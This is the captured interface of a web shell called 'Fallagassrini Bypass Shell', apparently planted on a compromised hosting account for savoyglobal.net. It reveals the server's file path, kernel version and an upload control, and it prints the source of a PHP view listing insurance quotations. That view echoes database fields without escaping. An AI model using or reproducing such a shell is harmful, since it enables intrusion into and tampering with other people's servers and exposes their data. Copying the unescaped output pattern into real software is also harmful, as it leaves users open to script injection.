? Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home1/savoy/www/savoyglobal.net/drafthr/system/application/views/Policies/

Linux gator3171.hostgator.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Upload File :
Current File : /home1/savoy/www/savoyglobal.net/drafthr/system/application/views/Policies/loadquotlist.php

<?php  if ( ! defined('BASEPATH')) exit('No direct script access allowed');?> <table class="sort" cellpadding="0" cellspacing="0">
                                    <caption>Quotations</caption>
                                    <thead><tr>
        <th>Sl.NO</th>
        <th>Quotation Ref No</th>
       <th>Customer Name</th>
       <th >Customer Code</th>
       <th>Type Of Cover</th>
       <th class="last">Use</th>
    </tr>
 <?php
$id=1;

if(count($viewinfo)>0)
{
	foreach ($viewinfo as $row)
	{
		echo '<tr><td>'.$id.'</td>
                            <td>'.$row['qref'].'</td>
			  <td>'.$row['cname'].'</td>
			  <td>'.$row['ccode'].'</td>
			   <td>'.$row['cover'].'</td>';

$insurer = $this->policiesmodel->getinsurer($row['qref']);

			  ?>
       <td>

    	<img src="<?=base_url()?>/assets/images/use.png"  class="clickimage" onclick="usequot('<?=$row['qref']?>','<?=$row['cname']?>','<?=addslashes($row['cover'])?>','<?=$insurer?>')" alt="" width="20" height="20" />
		</td>
		<?php
		$id++;
	}
}
else{
    echo "<tr><td align='center'>No results found</td><td></td><td></td><td></td><td></td><td></td></tr>";
}
?>
</table>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net